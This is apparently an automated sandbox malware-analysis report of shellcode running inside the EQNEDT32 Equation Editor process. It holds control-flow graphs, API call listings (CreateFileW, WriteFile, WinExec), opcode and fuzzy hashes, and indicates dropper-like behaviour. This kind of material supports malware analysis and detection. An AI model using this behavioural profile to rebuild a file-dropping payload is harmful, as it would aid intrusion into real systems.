35208c7-35208ca 512->522 513->504 514->513 521->502 522->512 524 35208cc 522->524 524->488
                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(03520651), ref: 03520661
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 8efb823637949394a820d562d74b85bc2a80829c3a1ef3dc7f2820635516555f
                                                                      • Instruction ID: 086d253a31aa04aadfec696866f1225d372a918fd8033ece4a8adebf6683f76d
                                                                      • Opcode Fuzzy Hash: 8efb823637949394a820d562d74b85bc2a80829c3a1ef3dc7f2820635516555f
                                                                      • Instruction Fuzzy Hash: C631002044E7D12EC712E7345D9AB5ABF74BF83600F1880CEE1824F5F3E65A6205D716
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 03520776 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 525 3520776-3520788 call 352079a 529 352078a 525->529 530 35207ef-35207f0 525->530 531 3520805-352080c 529->531 532 352078c-352078e 529->532 533 35207f4-35207ff WriteFile 530->533 534 3520873-352087e WinExec call 3520887 531->534 535 352080e-3520813 531->535 536 3520790-3520791 532->536 537 35207f1 532->537 538 35207b9-35207be 533->538 553 35208d0 534->553 554 3520880 534->554 540 3520817-352082d call 3520836 535->540 536->533 543 3520793-35207b1 call 35207b4 536->543 539 35207f3 537->539 537->540 552 35207c4-35207ca 538->552 539->533 556 352089b-35208a3 540->556 557 352082f 540->557 558 35207b3-35207b7 543->558 559 3520814 543->559 560 3520801-352080c call 3520815 552->560 561 35207cc-35207d1 552->561 564 35208d2-35208d6 553->564 565 35208d8-35208dc 553->565 562 3520882-352088c ExitProcess 554->562 563 35208f1-35208f3 554->563 575 35208a5-35208a7 556->575 576 35208c9-35208cd 556->576 567 3520831-3520832 557->567 568 352089a 557->568 558->538 559->540 560->534 560->535 572 35207d3-35207d6 561->572 573 35207d8-35207eb 561->573 574 3520903-3520904 563->574 564->565 566 35208e4-35208eb 564->566 565->563 569 35208de-35208e2 565->569 580 35208ef 566->580 581 35208ed 566->581 578 3520834-3520860 call 3520867 567->578 579 35208a8-35208ad 567->579 568->556 569->563 569->566 572->573 573->530 575->579 576->553 578->568 586 35208af-35208b4 579->586 587 352089c-35208ad call 35208b6 579->587 580->563 584 35208f5-35208fe 580->584 581->563 594 3520900 584->594 595 35208c7-35208ca 584->595 586->576 587->586 594->574 595->584 597 35208cc 595->597 597->553
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: b1b615c9d91ddc0e5ea21e5ff36653efc2f68e1bf6564cc91f7788a87a4d63e5
                                                                      • Instruction ID: 0a3a33abdaae24cf95cf7635b2a5da44e5a6bc95988375dbfc340cc6122e3dbc
                                                                      • Opcode Fuzzy Hash: b1b615c9d91ddc0e5ea21e5ff36653efc2f68e1bf6564cc91f7788a87a4d63e5
                                                                      • Instruction Fuzzy Hash: 7121E9714093556FD710EA609D81B6BFFB9FBC3B40F18894DF5914B0F2E2B1D5098AA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0352070D Relevance: 1.6, APIs: 1, Instructions: 84fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 598 352070d-3520722 call 3520729 602 3520725 598->602 603 352079a 598->603 604 3520728-3520738 602->604 605 352079c 602->605 606 352079d-35207b1 call 35207b4 603->606 607 352073e-352074f call 352075a 604->607 605->606 611 35207b3 606->611 612 3520814 606->612 614 35207b6-35207b7 607->614 616 3520751-3520757 607->616 611->614 615 3520817-352082d call 3520836 612->615 618 35207b9-35207bd 614->618 626 352089b-35208a3 615->626 627 352082f 615->627 621 3520759-352076d call 3520776 616->621 622 35207be-35207ca 616->622 618->622 641 35207d8-35207ff WriteFile 621->641 657 352076f 621->657 632 3520801-352080c call 3520815 622->632 633 35207cc-35207d1 622->633 634 35208a5-35208a7 626->634 635 35208c9-35208cd 626->635 629 3520831-3520832 627->629 630 352089a 627->630 636 3520834-3520860 call 3520867 629->636 637 35208a8-35208ad 629->637 630->626 655 3520873-352087e WinExec call 3520887 632->655 656 352080e-3520813 632->656 640 35207d3 633->640 633->641 634->637 642 35208d0 635->642 636->630 646 35208af-35208b4 637->646 647 352089c-35208ad call 35208b6 637->647 645 35207d6 640->645 641->618 648 35208d2-35208d6 642->648 649 35208d8-35208dc 642->649 645->641 646->635 647->646 648->649 650 35208e4-35208eb 648->650 652 35208f1-35208f3 649->652 653 35208de-35208e2 649->653 660 35208ef 650->660 661 35208ed 650->661 662 3520903-3520904 652->662 653->650 653->652 655->642 675 3520880 655->675 656->615 657->645 665 3520771-352077a 657->665 660->652 667 35208f5-35208fe 660->667 661->652 673 3520900 667->673 674 35208c7-35208ca 667->674 673->662 674->667 676 35208cc 674->676 675->652 677 3520882-352088c ExitProcess 675->677 676->642
                                                                      APIs
                                                                      • WriteFile.KERNELBASE(035206EE,03520705,00000000,00000000,00000000,?,03520705,035206EE,00000000,00000000,00000000,00000000,035206A7,00000050,00000000), ref: 035207FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: e52008649e949c67fc193a14be535757e52065788752b6a9b4a718ad1f39f738
                                                                      • Instruction ID: b813092f320749e198228568f33b433124ac59ed798c8b3ba48a2bd79f2ebf31
                                                                      • Opcode Fuzzy Hash: e52008649e949c67fc193a14be535757e52065788752b6a9b4a718ad1f39f738
                                                                      • Instruction Fuzzy Hash: 3821C5304097967FCB11EB649D81B6FBFB9FFC3B40F18894CB1815A0F2E67586088A65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0352059B Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 680 352059b-35205a9 call 3520907 call 35205b7 685 35205fc-3520618 680->685 686 35205ac 680->686 690 3520619-352061f call 352062a 685->690 688 35205ae-35205b1 686->688 689 352061d-352061f 686->689 688->690 693 35205b4-35205ce 688->693 691 3520620-3520622 689->691 692 3520686 call 352069a 689->692 690->692 703 3520621-3520622 690->703 695 3520624-352063a 691->695 696 3520689-35206d2 call 35206c1 691->696 692->696 700 352063f-352064c CreateFileW call 3520661 693->700 706 35205d0-35205d6 693->706 695->700 714 35206d4-35206d6 696->714 715 3520739 696->715 708 3520651-352065f 700->708 703->695 703->696 712 352064a 706->712 713 35205d8-35205fb call 3520617 706->713 708->692 712->708 722 352064c call 3520661 712->722 713->685 717 35206d9 714->717 718 352074e-352074f 714->718 719 352073b-3520747 call 352075a 715->719 720 352075f-352076d call 3520776 715->720 724 3520750-3520752 717->724 725 35206dc-3520722 call 3520700 717->725 718->724 726 35207b6-35207b7 718->726 733 35207bd 719->733 748 3520749 719->748 744 35207d8-35207ff WriteFile 720->744 745 352076f 720->745 722->708 732 3520755-3520757 724->732 746 3520725 725->746 747 352079a 725->747 727 35207b9 726->727 727->733 734 3520759-352075d 732->734 735 35207be-35207ca 732->735 733->735 734->720 749 3520801-352080c call 3520815 735->749 750 35207cc-35207d1 735->750 744->727 751 3520771-352077a 745->751 752 35207d6 745->752 753 3520728-352074f call 352075a 746->753 754 352079c 746->754 756 352079d-35207b1 call 35207b4 747->756 755 352074b 748->755 748->756 767 3520873-352087e WinExec call 3520887 749->767 768 352080e-3520813 749->768 750->744 758 35207d3 750->758 752->744 753->726 776 3520751-3520752 753->776 754->756 755->718 765 35207b3 756->765 766 3520814 756->766 758->752 765->726 771 3520817-352082d call 3520836 766->771 779 35208d0 767->779 780 3520880 767->780 768->771 782 352089b-35208a3 771->782 783 352082f 771->783 776->732 786 35208d2-35208d6 779->786 787 35208d8-35208dc 779->787 784 3520882-352088c ExitProcess 780->784 785 35208f1-35208f3 780->785 793 35208a5-35208a7 782->793 794 35208c9-35208cd 782->794 789 3520831-3520832 783->789 790 352089a 783->790 792 3520903-3520904 785->792 786->787 788 35208e4-35208eb 786->788 787->785 791 35208de-35208e2 787->791 798 35208ef 788->798 799 35208ed 788->799 796 3520834-3520860 call 3520867 789->796 797 35208a8-35208ad 789->797 790->782 791->785 791->788 793->797 794->779 796->790 801 35208af-35208b4 797->801 802 352089c-35208ad call 35208b6 797->802 798->785 800 35208f5-35208fe 798->800 799->785 809 3520900 800->809 810 35208c7-35208ca 800->810 801->794 802->801 809->792 810->800 812 35208cc 810->812 812->779
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 2c3b1a2a4d8c223b42b358fe31970d745bcf46a9219579a97104c1c12bc46b9b
                                                                      • Instruction ID: f30fff5c8884921b777bf9e9a04237f86c4e64de3f3054d75c06e318e15f3baf
                                                                      • Opcode Fuzzy Hash: 2c3b1a2a4d8c223b42b358fe31970d745bcf46a9219579a97104c1c12bc46b9b
                                                                      • Instruction Fuzzy Hash: B2210DA580F3E15FE322D3202D9EB55BE24BBD3600F1D858A90C14F1F3D299B10A93A6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 035205B7 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 813 35205b7-35205ce call 3520907 call 35205de 820 35205d0-35205d6 813->820 821 352063f-352064c CreateFileW call 3520661 813->821 824 352064a 820->824 825 35205d8-352061f call 3520617 call 352062a 820->825 826 3520651-352065f 821->826 824->826 828 352064c call 3520661 824->828 834 3520686 call 352069a 825->834 845 3520621-3520622 825->845 826->834 828->826 838 3520689-35206d2 call 35206c1 834->838 846 35206d4-35206d6 838->846 847 3520739 838->847 845->838 848 3520624-352063a 845->848 849 35206d9 846->849 850 352074e-352074f 846->850 851 352073b-3520747 call 352075a 847->851 852 352075f-352076d call 3520776 847->852 848->821 853 3520750-3520752 849->853 854 35206dc-3520722 call 3520700 849->854 850->853 855 35207b6-35207b7 850->855 861 35207bd 851->861 875 3520749 851->875 871 35207d8-35207ff WriteFile 852->871 872 352076f 852->872 860 3520755-3520757 853->860 873 3520725 854->873 874 352079a 854->874 856 35207b9 855->856 856->861 862 3520759-352075d 860->862 863 35207be-35207ca 860->863 861->863 862->852 876 3520801-352080c call 3520815 863->876 877 35207cc-35207d1 863->877 871->856 878 3520771-352077a 872->878 879 35207d6 872->879 880 3520728-352074f call 352075a 873->880 881 352079c 873->881 883 352079d-35207b1 call 35207b4 874->883 882 352074b 875->882 875->883 894 3520873-352087e WinExec call 3520887 876->894 895 352080e-3520813 876->895 877->871 885 35207d3 877->885 879->871 880->855 903 3520751-3520752 880->903 881->883 882->850 892 35207b3 883->892 893 3520814 883->893 885->879 892->855 898 3520817-352082d call 3520836 893->898 906 35208d0 894->906 907 3520880 894->907 895->898 909 352089b-35208a3 898->909 910 352082f 898->910 903->860 913 35208d2-35208d6 906->913 914 35208d8-35208dc 906->914 911 3520882-352088c ExitProcess 907->911 912 35208f1-35208f3 907->912 920 35208a5-35208a7 909->920 921 35208c9-35208cd 909->921 916 3520831-3520832 910->916 917 352089a 910->917 919 3520903-3520904 912->919 913->914 915 35208e4-35208eb 913->915 914->912 918 35208de-35208e2 914->918 925 35208ef 915->925 926 35208ed 915->926 923 3520834-3520860 call 3520867 916->923 924 35208a8-35208ad 916->924 917->909 918->912 918->915 920->924 921->906 923->917 928 35208af-35208b4 924->928 929 352089c-35208ad call 35208b6 924->929 925->912 927 35208f5-35208fe 925->927 926->912 936 3520900 927->936 937 35208c7-35208ca 927->937 928->921 929->928 936->919 937->927 939 35208cc 937->939 939->906
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: e4d30f52fa01deb95ec5d8623ed11d396d63132c4e4b819a89fb2f372498a43f
                                                                      • Instruction ID: c4da6e27dc3e1c8ae0ab288672171094a05fdc6f10452d002f8cbd2c874740b8
                                                                      • Opcode Fuzzy Hash: e4d30f52fa01deb95ec5d8623ed11d396d63132c4e4b819a89fb2f372498a43f
                                                                      • Instruction Fuzzy Hash: 6D112EA580E3E11FE321D3202D9EB95FE24BB93600F0D868A91C54F1F3D291A10A9296
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0352079A Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 940 352079a-35207b1 call 35207b4 944 35207b3-35207b7 940->944 945 3520814 940->945 948 35207b9-35207ca 944->948 947 3520817-352082d call 3520836 945->947 954 352089b-35208a3 947->954 955 352082f 947->955 963 3520801-352080c call 3520815 948->963 964 35207cc-35207d1 948->964 959 35208a5-35208a7 954->959 960 35208c9-35208cd 954->960 956 3520831-3520832 955->956 957 352089a 955->957 961 3520834-3520860 call 3520867 956->961 962 35208a8-35208ad 956->962 957->954 959->962 965 35208d0 960->965 961->957 969 35208af-35208b4 962->969 970 352089c-35208ad call 35208b6 962->970 983 3520873-352087e WinExec call 3520887 963->983 984 352080e-3520813 963->984 967 35207d3-35207d6 964->967 968 35207d8-35207ff WriteFile 964->968 971 35208d2-35208d6 965->971 972 35208d8-35208dc 965->972 967->968 968->948 969->960 970->969 971->972 973 35208e4-35208eb 971->973 975 35208f1-35208f3 972->975 976 35208de-35208e2 972->976 981 35208ef 973->981 982 35208ed 973->982 985 3520903-3520904 975->985 976->973 976->975 981->975 988 35208f5-35208fe 981->988 982->975 983->965 998 3520880 983->998 984->947 996 3520900 988->996 997 35208c7-35208ca 988->997 996->985 997->988 999 35208cc 997->999 998->975 1000 3520882-352088c ExitProcess 998->1000 999->965
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: abdf6eb72968487407a0b646d669ddb846f8ee2c648fe95060ec85859213e528
                                                                      • Instruction ID: 5b2ab0ebb0df2c716c089411244e666a5af36f1583682657cae9a0b0af06d9a9
                                                                      • Opcode Fuzzy Hash: abdf6eb72968487407a0b646d669ddb846f8ee2c648fe95060ec85859213e528
                                                                      • Instruction Fuzzy Hash: 1411A2714093566FDB10EA50DC81FAFBAB9FFC2B40F14895DB1905B0E1E6B1D5088AA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 03520729 Relevance: 1.6, APIs: 1, Instructions: 64fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1003 3520729-352074f call 352075a 1008 3520751-3520757 1003->1008 1009 35207b6-35207b7 1003->1009 1013 3520759-352076d call 3520776 1008->1013 1014 35207be-35207ca 1008->1014 1011 35207b9-35207bd 1009->1011 1011->1014 1023 35207d8-35207ff WriteFile 1013->1023 1029 352076f 1013->1029 1018 3520801-352080c call 3520815 1014->1018 1019 35207cc-35207d1 1014->1019 1027 3520873-352087e WinExec call 3520887 1018->1027 1028 352080e-352082d call 3520836 1018->1028 1022 35207d3 1019->1022 1019->1023 1026 35207d6 1022->1026 1023->1011 1026->1023 1040 35208d0 1027->1040 1041 3520880 1027->1041 1043 352089b-35208a3 1028->1043 1044 352082f 1028->1044 1029->1026 1033 3520771-352077a 1029->1033 1047 35208d2-35208d6 1040->1047 1048 35208d8-35208dc 1040->1048 1045 3520882-352088c ExitProcess 1041->1045 1046 35208f1-35208f3 1041->1046 1054 35208a5-35208a7 1043->1054 1055 35208c9-35208cd 1043->1055 1050 3520831-3520832 1044->1050 1051 352089a 1044->1051 1053 3520903-3520904 1046->1053 1047->1048 1049 35208e4-35208eb 1047->1049 1048->1046 1052 35208de-35208e2 1048->1052 1059 35208ef 1049->1059 1060 35208ed 1049->1060 1057 3520834-3520860 call 3520867 1050->1057 1058 35208a8-35208ad 1050->1058 1051->1043 1052->1046 1052->1049 1054->1058 1055->1040 1057->1051 1062 35208af-35208b4 1058->1062 1063 352089c-35208ad call 35208b6 1058->1063 1059->1046 1061 35208f5-35208fe 1059->1061 1060->1046 1070 3520900 1061->1070 1071 35208c7-35208ca 1061->1071 1062->1055 1063->1062 1070->1053 1071->1061 1073 35208cc 1071->1073 1073->1040
                                                                      APIs
                                                                      • WriteFile.KERNELBASE(035206EE,03520705,00000000,00000000,00000000,?,03520705,035206EE,00000000,00000000,00000000,00000000,035206A7,00000050,00000000), ref: 035207FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: efe35d33fb53c262e8aff48a2b14a8252caba624d41dc55ac144238288ad08bd
                                                                      • Instruction ID: dfb47b57efd501a4434b198404b4208f3c397854d50d9bdf6401947b9b85e430
                                                                      • Opcode Fuzzy Hash: efe35d33fb53c262e8aff48a2b14a8252caba624d41dc55ac144238288ad08bd
                                                                      • Instruction Fuzzy Hash: 27114C304097566AD711EA14DC41F6BBFA9FBC2B40F08891CB591560F1E67195098BA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 035205DE Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1074 35205de-352061f call 3520617 call 352062a 1083 3520621-3520622 1074->1083 1084 3520686 call 352069a 1074->1084 1085 3520624-352065f CreateFileW call 3520661 1083->1085 1086 3520689-35206d2 call 35206c1 1083->1086 1084->1086 1085->1084 1095 35206d4-35206d6 1086->1095 1096 3520739 1086->1096 1098 35206d9 1095->1098 1099 352074e-352074f 1095->1099 1100 352073b-3520747 call 352075a 1096->1100 1101 352075f-352076d call 3520776 1096->1101 1103 3520750-3520752 1098->1103 1104 35206dc-3520722 call 3520700 1098->1104 1099->1103 1105 35207b6-35207b7 1099->1105 1111 35207bd 1100->1111 1125 3520749 1100->1125 1121 35207d8-35207ff WriteFile 1101->1121 1122 352076f 1101->1122 1110 3520755-3520757 1103->1110 1123 3520725 1104->1123 1124 352079a 1104->1124 1106 35207b9 1105->1106 1106->1111 1112 3520759-352075d 1110->1112 1113 35207be-35207ca 1110->1113 1111->1113 1112->1101 1126 3520801-352080c call 3520815 1113->1126 1127 35207cc-35207d1 1113->1127 1121->1106 1128 3520771-352077a 1122->1128 1129 35207d6 1122->1129 1130 3520728-352074f call 352075a 1123->1130 1131 352079c 1123->1131 1133 352079d-35207b1 call 35207b4 1124->1133 1132 352074b 1125->1132 1125->1133 1144 3520873-352087e WinExec call 3520887 1126->1144 1145 352080e-3520813 1126->1145 1127->1121 1135 35207d3 1127->1135 1129->1121 1130->1105 1153 3520751-3520752 1130->1153 1131->1133 1132->1099 1142 35207b3 1133->1142 1143 3520814 1133->1143 1135->1129 1142->1105 1148 3520817-352082d call 3520836 1143->1148 1156 35208d0 1144->1156 1157 3520880 1144->1157 1145->1148 1159 352089b-35208a3 1148->1159 1160 352082f 1148->1160 1153->1110 1163 35208d2-35208d6 1156->1163 1164 35208d8-35208dc 1156->1164 1161 3520882-352088c ExitProcess 1157->1161 1162 35208f1-35208f3 1157->1162 1170 35208a5-35208a7 1159->1170 1171 35208c9-35208cd 1159->1171 1166 3520831-3520832 1160->1166 1167 352089a 1160->1167 1169 3520903-3520904 1162->1169 1163->1164 1165 35208e4-35208eb 1163->1165 1164->1162 1168 35208de-35208e2 1164->1168 1175 35208ef 1165->1175 1176 35208ed 1165->1176 1173 3520834-3520860 call 3520867 1166->1173 1174 35208a8-35208ad 1166->1174 1167->1159 1168->1162 1168->1165 1170->1174 1171->1156 1173->1167 1178 35208af-35208b4 1174->1178 1179 352089c-35208ad call 35208b6 1174->1179 1175->1162 1177 35208f5-35208fe 1175->1177 1176->1162 1186 3520900 1177->1186 1187 35208c7-35208ca 1177->1187 1178->1171 1179->1178 1186->1169 1187->1177 1189 35208cc 1187->1189 1189->1156
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 02f976522695f3370a17684948930a1800c7a1aaafdf2fdfc1499f6d152197b6
                                                                      • Instruction ID: 2c1b56e3d4e58ebd85cec689f952cc6f9a5d5eeda3f8f75b826e5a2f865d97ac
                                                                      • Opcode Fuzzy Hash: 02f976522695f3370a17684948930a1800c7a1aaafdf2fdfc1499f6d152197b6
                                                                      • Instruction Fuzzy Hash: 0601B5A540E3D41FD321D3302C5EB91BE647F93604F1D868EA1C48F1E3D2A5A1098396
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0352075A Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1190 352075a-352076d call 3520776 1196 35207d8-35207ff WriteFile 1190->1196 1197 352076f 1190->1197 1207 3520801-352080c call 3520815 1196->1207 1208 35207cc-35207d1 1196->1208 1198 3520771-352077a 1197->1198 1199 35207d6 1197->1199 1199->1196 1212 3520873-352087e WinExec call 3520887 1207->1212 1213 352080e-352082d call 3520836 1207->1213 1208->1196 1210 35207d3 1208->1210 1210->1199 1220 35208d0 1212->1220 1221 3520880 1212->1221 1223 352089b-35208a3 1213->1223 1224 352082f 1213->1224 1227 35208d2-35208d6 1220->1227 1228 35208d8-35208dc 1220->1228 1225 3520882-352088c ExitProcess 1221->1225 1226 35208f1-35208f3 1221->1226 1234 35208a5-35208a7 1223->1234 1235 35208c9-35208cd 1223->1235 1230 3520831-3520832 1224->1230 1231 352089a 1224->1231 1233 3520903-3520904 1226->1233 1227->1228 1229 35208e4-35208eb 1227->1229 1228->1226 1232 35208de-35208e2 1228->1232 1239 35208ef 1229->1239 1240 35208ed 1229->1240 1237 3520834-3520860 call 3520867 1230->1237 1238 35208a8-35208ad 1230->1238 1231->1223 1232->1226 1232->1229 1234->1238 1235->1220 1237->1231 1242 35208af-35208b4 1238->1242 1243 352089c-35208ad call 35208b6 1238->1243 1239->1226 1241 35208f5-35208fe 1239->1241 1240->1226 1250 3520900 1241->1250 1251 35208c7-35208ca 1241->1251 1242->1235 1243->1242 1250->1233 1251->1241 1253 35208cc 1251->1253 1253->1220
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: ab915c4d70da9f5e50a6ad1d4eaedeb20efed64c161fa0c5c37ea620a5e12464
                                                                      • Instruction ID: 43a75ce9f7375c83d204b0b6b3b93a5cc2375572f2d5b388412e4fe23e671bd9
                                                                      • Opcode Fuzzy Hash: ab915c4d70da9f5e50a6ad1d4eaedeb20efed64c161fa0c5c37ea620a5e12464
                                                                      • Instruction Fuzzy Hash: 75F0F671008756AFD712DE14DC41F6BBAAAFBC6B80F088D1DB1905A0F5D77599088B62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0352062A Relevance: 1.5, APIs: 1, Instructions: 21fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1254 352062a-35206d2 CreateFileW call 3520661 call 352069a call 35206c1 1268 35206d4-35206d6 1254->1268 1269 3520739 1254->1269 1270 35206d9 1268->1270 1271 352074e-352074f 1268->1271 1272 352073b-352073e call 352075a 1269->1272 1273 352075f-352076d call 3520776 1269->1273 1274 3520750-3520752 1270->1274 1275 35206dc-3520722 call 3520700 1270->1275 1271->1274 1276 35207b6-35207b7 1271->1276 1290 352073f-3520747 1272->1290 1292 35207d8-35207ff WriteFile 1273->1292 1293 352076f 1273->1293 1281 3520755-3520757 1274->1281 1294 3520725 1275->1294 1295 352079a 1275->1295 1277 35207b9 1276->1277 1282 35207bd 1277->1282 1283 3520759-352075d 1281->1283 1284 35207be-35207ca 1281->1284 1282->1284 1283->1273 1297 3520801-352080c call 3520815 1284->1297 1298 35207cc-35207d1 1284->1298 1290->1282 1296 3520749 1290->1296 1292->1277 1299 3520771-352077a 1293->1299 1300 35207d6 1293->1300 1301 3520728-3520738 1294->1301 1302 352079c 1294->1302 1304 352079d-35207b1 call 35207b4 1295->1304 1303 352074b 1296->1303 1296->1304 1315 3520873-352087e WinExec call 3520887 1297->1315 1316 352080e-3520813 1297->1316 1298->1292 1306 35207d3 1298->1306 1300->1292 1312 352073e-352074f call 352075a 1301->1312 1302->1304 1303->1271 1313 35207b3 1304->1313 1314 3520814 1304->1314 1306->1300 1312->1276 1324 3520751-3520752 1312->1324 1313->1276 1319 3520817-352082d call 3520836 1314->1319 1327 35208d0 1315->1327 1328 3520880 1315->1328 1316->1319 1330 352089b-35208a3 1319->1330 1331 352082f 1319->1331 1324->1281 1334 35208d2-35208d6 1327->1334 1335 35208d8-35208dc 1327->1335 1332 3520882-352088c ExitProcess 1328->1332 1333 35208f1-35208f3 1328->1333 1341 35208a5-35208a7 1330->1341 1342 35208c9-35208cd 1330->1342 1337 3520831-3520832 1331->1337 1338 352089a 1331->1338 1340 3520903-3520904 1333->1340 1334->1335 1336 35208e4-35208eb 1334->1336 1335->1333 1339 35208de-35208e2 1335->1339 1346 35208ef 1336->1346 1347 35208ed 1336->1347 1344 3520834-3520860 call 3520867 1337->1344 1345 35208a8-35208ad 1337->1345 1338->1330 1339->1333 1339->1336 1341->1345 1342->1327 1344->1338 1349 35208af-35208b4 1345->1349 1350 352089c-35208ad call 35208b6 1345->1350 1346->1333 1348 35208f5-35208fe 1346->1348 1347->1333 1357 3520900 1348->1357 1358 35208c7-35208ca 1348->1358 1349->1342 1350->1349 1357->1340 1358->1348 1360 35208cc 1358->1360 1360->1327
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 03520647
                                                                        • Part of subcall function 03520661: LoadLibraryW.KERNEL32(03520651), ref: 03520661
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileLibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 2049390123-0
                                                                      • Opcode ID: 6b58b7bea42888d99f99c58fd6019879577d5c0d287c541efadc83ec232d07e8
                                                                      • Instruction ID: ebfa2131a1514e214835c26d5f05bbacc885a552660082fbf29072a598247d3d
                                                                      • Opcode Fuzzy Hash: 6b58b7bea42888d99f99c58fd6019879577d5c0d287c541efadc83ec232d07e8
                                                                      • Instruction Fuzzy Hash: 6DE0127454A3912AD231D7301D9EF95AD647FC3B04F0DC989B2C4AF1F2C6A5B0048295
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

